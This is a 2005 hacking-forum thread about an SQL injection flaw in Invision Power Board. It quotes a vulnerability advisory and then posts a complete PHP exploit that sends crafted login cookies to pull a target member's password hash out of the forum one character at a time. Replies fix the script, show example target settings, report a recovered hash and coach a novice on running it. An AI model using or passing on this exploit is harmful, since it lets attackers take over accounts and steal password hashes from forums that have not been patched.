|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Another Invision Power Board SQL Injection exploit <2.0.4 |
|
Posted: Tue May 17, 2005 12:01 am |
|
|
ColdWinteR |
Beginner |
|
|
Joined: May 17, 2005 |
Posts: 1 |
|
|
|
|
|
|
|
Quote: | ##########################################################
# GulfTech Security Research May 5th, 2005
##########################################################
# Vendor : Invision Power Services
# URL : http://www.invisionboard.com/
# Version : All Versions Prior To 2.0.4
# Risk : Multiple Vulnerabilities
##########################################################
Description:
Invision Power Board (IPB) is a professional forum system that
has been built from the ground up with speed and security in
mind. It is used by a great many people all over the world. All
versions of Invision Power Board are vulnerable to a serious
SQL Injection vulnerability if magic_quotes_gpc is set to off.
An attacker does not have to be logged in, or even have access
or permission to view the forums in order to exploit this
vulnerability. Users should upgrade immediately.
SQL Injection:
I have discovered a serious SQL Injection issue in Invision
Power Board that affects most all versions of Invision Power
Board regardless of most server configurations. Also, because
of the fact that UNION functionality is not needed an attacker
need not worry if the victim is running an up to date version
of MySQL. The vulnerability lies in the way that Invision Board
handles certain types of "login methods". Let us have a look
at the source of 'sources/login.php'
if ( ! $ibforums->member['id'] )
{
$mid = intval($std->my_getcookie('member_id'));
$pid = $std->my_getcookie('pass_hash');
If ($mid and $pid)
{
$DB->query("SELECT * FROM ibf_members WHERE id=$mid AND
password='$pid'");
if ( $member = $DB->fetch_row() )
{
$ibforums->member = $member;
$ibforums->session_id = "";
$std->my_setcookie('session_id','0', -1 );
}
}
}
This particular portion of code is from the IPB 1.* series, but
the vulnerability seems to exists on all versions of IPB (both
the 1.* and 2.* series). Anyway, as we can see from the above
code the variable $mid is properly forced into an integer datatype
and as a result is safe to pass to the query, but what about
$pid? In the above code we see that the value of $pid is returned
from the my_getcookie() function within the FUNC class. Well,
let us have a look at this function to see if $pid is sanitized
within the function itself.
function my_getcookie($name)
{
global $ibforums;
if (isset($_COOKIE[$ibforums->vars['cookie_id'].$name]))
{
return urldecode($_COOKIE[$ibforums->vars['cookie_id'].$name]);
}
else
{
return FALSE;
}
}
In the above code we can see that not only is the data
unsanitized, but the way the urldecode() function is used also
lets an attacker bypass magic_quotes_gpc. Now, back to the
auto_login() function where we want to concentrate on this bit
of code.
$DB->query("SELECT * FROM ibf_members WHERE id=$mid AND password='$pid'");
if ( $member = $DB->fetch_row() )
{
$ibforums->member = $member;
$ibforums->session_id = "";
$std->my_setcookie('session_id','0', -1 );
}
This would be a very easy issue to exploit if visible data was
returned to the browser, but all we will be able to see is a line
in the response header that looks something like this.
Set-Cookie: session_id=0; path=/; domain=example.com
If we see this then we know the query returned true and produced
some results. This is not that easy of an issue to exploit, but
there are a number of ways to successfully take advantage of this
issue. For one an attacker can select member data into an outfile
and use their browser to retrieve that data, or use the MySQL "mid"
function to enumerate each character of the hash one by one until
the entire hash is discovered! In future versions of MySQL issues
like this will be a lot easier to exploit as we will then be able
to "SELECT * FROM `blah` INTO TABLE `foobar`" much like Oracle
database for example. With functionality like that an attacker can
then do things like dump user data into a message to himself. There
is working exploit code for this issue available, but we will not
be releasing it publicly. Users should upgrade as soon as possible,
as this is a fairly dangerous vulnerability.
Cross Site Scripting:
It is possible for an attacker to conduct Cross Site Scripting attacks
in all versions of invision power board prior to the recently released
2.0.4. This vulnerability exists due to data submitted to the "highlite"
parameter not being sanitized properly when displaying search results.
The same issue also exists in "sources/topics.php". The only condition
is that the data sent to the "highlite" parameter must be double hex
encoded data in order to bypass the global sanitation methods.
Solution:
Matthew Mecham addressed these issues in a VERY timely and professional
manner and fixes have been available for some time now.
http://forums.invisionpower.com/index.php?showtopic=168016
All users should upgrade their Invision Power Board installations as
soon as possible, as these vulnerabilities make it fairly easy to grab
sensitive user data including password hashes from the database.
Special Thanks:
GulfTech Security Research team would like to thank Mr. Janek Vind for
working with us in finding creative ways to exploit these issues. You
can visit his website at http://www.waraxe.us
Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00073-05052005
Credits:
James Bercegay of the GulfTech Security Research Team |
The following exploit is made available (by "David Wang"):
Code: | <?php
$server = "SERVER";
$port = 80;
$file = "PATH";
$target = 81;
/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";
$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;
while( !($found) ) {
$letter = substr($hex, $idx, 1);
/* %2527 translates to %27, which gets past magic quotes.
This is translated to ' by urldecode. */
$cookie =
"member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
$cookie .=
"%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
/* Query is in effect: SELECT * FROM ibf_members
WHERE id=$id AND password='$pass' OR
id=$target
HAVING id=$target AND
MID(`password`,$i,1)='$letter' */
$header = getHeader($server, $port, $file .
"index.php?act=Login&CODE=autologin", $cookie);
if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/',
$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}
echo "\n\nFinal Hash: $hash\n";
function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);
if (!$fp) {
return "Unknown";
} else {
$com = "HEAD $file HTTP/1.1\r\n";
$com .= "Host: $server:$port\r\n";
$com .= "Cookie: $cookie\r\n";
$com .= "Connection: close\r\n";
$com .= "\r\n";
fputs($fp, $com);
do {
$header.= fread($fp, 512);
} while( !preg_match('/\r\n\r\n$/',$header) );
}
return $header;
}
?> |
My test result was something like this:
Code: | 1: 0 2: 0 3: 0 4: 0 5: 0 6: 0 7: 0 8: 0 9: 0 10: 0 11: 0 12: 0 13: 0 14: 0 15: 0 16: 0 17: 0 18: 0 19: 0 20: 0 21: 0 22: 0 23: 0 24: 0 25: 0 26: 0 27: 0 28: 0 29: 0 30: 0 31: 0 32: 0 Final Hash: 00000000000000000000000000000000 |
Could somebody successful exploit this? |
|
|
|
|
|
|
Re |
|
Posted: Wed Jun 01, 2005 10:32 pm |
|
|
mister |
Beginner |
|
|
Joined: Jun 02, 2005 |
Posts: 4 |
|
|
|
|
|
|
|
I Have the same result, nobody has information ???? |
|
|
|
|
Posted: Wed Jul 06, 2005 1:04 pm |
|
|
petitmaitreblanc |
Regular user |
|
|
Joined: Jul 05, 2005 |
Posts: 18 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Wed Jul 06, 2005 2:41 pm |
|
|
gulftech |
Valuable expert |
|
|
Joined: Apr 20, 2005 |
Posts: 9 |
|
|
|
|
|
|
|
The headers sent by this exploit script are not RFC compliant and confuse virtualhosts. That is why the LWP versions work (LWP Builds the headers for you) and this one does not. |
|
|
|
|
Posted: Thu Jul 07, 2005 6:49 pm |
|
|
str0ke |
Beginner |
|
|
Joined: Jul 07, 2005 |
Posts: 4 |
|
|
|
|
|
|
|
This exploit only works on 1.3.1 Final and below.
/str0ke |
|
|
|
|
|
Re: Another Invision Power Board SQL Injection exploit <2 |
|
Posted: Sun Sep 18, 2005 8:32 am |
|
|
nhtu |
Beginner |
|
|
Joined: Jan 13, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
Code: | <?php
$server = "SERVER";
$port = 80;
$file = "PATH";
?> |
My test result was something like this:
Code: | 1: 0 2: 0 3: 0 4: 0 5: 0 6: 0 7: 0 8: 0 9: 0 10: 0 11: 0 12: 0 13: 0 14: 0 15: 0 16: 0 17: 0 18: 0 19: 0 20: 0 21: 0 22: 0 23: 0 24: 0 25: 0 26: 0 27: 0 28: 0 29: 0 30: 0 31: 0 32: 0 Final Hash: 00000000000000000000000000000000 |
Could somebody successful exploit this? [/quote]
example:
$server = "www.hack.com";
$port = 80;
$file = "/"; or $file = "/forum/"; |
|
|
|
|
Posted: Sun Sep 18, 2005 11:13 am |
|
|
Unicorn |
Regular user |
|
|
Joined: Jul 17, 2005 |
Posts: 14 |
|
|
|
|
|
|
|
It works !
http://unicorn.pri.ee/kodeerija.php
1: 3 2: f 3: 1 4: c 5: d 6: 5 7: 7 8: 7 9: 0 10: c 11: c 12: d 13: 9 14: 9 15: 5 16: 7 17: 6 18: 4 19: f 20: d 21: b 22: f 23: 3 24: 5 25: 0 26: 3 27: 0 28: 9 29: 5 30: 5 31: 6 32: a Final Hash: 3f1cd5770ccd995764fdbf350309556a |
|
|
|
|
Posted: Wed Sep 21, 2005 8:01 am |
|
|
super |
Active user |
|
|
Joined: Sep 19, 2005 |
Posts: 30 |
|
|
|
|
|
|
|
how can I use this exploit? I don't know
showul I need a perl software for this? please tell me |
|
|
|
|
Posted: Wed Sep 21, 2005 2:03 pm |
|
|
Chb |
Valuable expert |
|
|
Joined: Jul 23, 2005 |
Posts: 206 |
Location: Germany |
|
|
|
|
|
|
super wrote: | showul I need a perl software for this? please tell me |
No, it's just a PHP script. So you need a webserver with PHP.
Then you have to fill in the variables in the script and run it. |
|
|
|
|
Posted: Wed Sep 21, 2005 2:30 pm |
|
|
super |
Active user |
|
|
Joined: Sep 19, 2005 |
Posts: 30 |
|
|
|
|
|
|
|
ok how could I fill the php? please tell me step by step if possible.
I have no idea about this exploit |
|
|
|
|
Posted: Wed Sep 21, 2005 3:24 pm |
|
|
Chb |
Valuable expert |
|
|
Joined: Jul 23, 2005 |
Posts: 206 |
Location: Germany |
|
|
|
|
|
|
super wrote: | ok how could I fill the php? please tell me step by step if possible.
I have no idea about this exploit |
Just look at the first four rows... |
|
|
|
|
Posted: Thu Sep 22, 2005 4:00 pm |
|
|
super |
Active user |
|
|
Joined: Sep 19, 2005 |
Posts: 30 |
|
|
|
|
|
|
|
should I need upload this PHP file?if need where I upload it?please show some link where I can upload this PHP file?how can I upload it? |
|
|
|
|
Posted: Fri Sep 23, 2005 2:34 pm |
|
|
Chb |
Valuable expert |
|
|
Joined: Jul 23, 2005 |
Posts: 206 |
Location: Germany |
|
|
|
|
|
|
Drop it until you know the basics I'd say...
Google ftp-client, sql-injection, php, apache... |
|
|
|
|
Posted: Mon Sep 26, 2005 8:58 pm |
|
|
super |
Active user |
|
|
Joined: Sep 19, 2005 |
Posts: 30 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Tue Sep 27, 2005 11:26 am |
|
|
Chb |
Valuable expert |
|
|
Joined: Jul 23, 2005 |
Posts: 206 |
Location: Germany |
|
|
|
|
|
|
The webserver of your webspace does not accept PHP scripts. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|